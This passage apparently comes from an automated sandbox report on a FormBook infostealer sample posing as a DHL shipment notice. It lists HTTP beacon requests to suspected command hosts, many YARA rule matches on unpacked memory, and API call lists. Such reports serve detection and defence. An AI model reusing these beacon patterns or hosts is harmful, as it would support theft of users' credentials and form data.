6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: svchost.exe, 00000011.00000002.515898561.0000000003A1F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ultrakill.xyz/
          Source: unknownDNS traffic detected: queries for: www.rtpholywin99.com
          Source: global trafficHTTP traffic detected: GET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1Host: www.rtpholywin99.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1Host: www.keilaniclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1Host: www.ultrakill.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D71890
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D77E88
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D796A0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D79C12
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7B3F1
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7A184
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7C3BD
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041E28A
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041EBD9
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041E3E9
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D563
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00409E4B
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041DE6E
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041DFE4
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D71890
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D7A184
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D7B3F1
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D79C12
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D77E88
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D796A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305ABD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1002
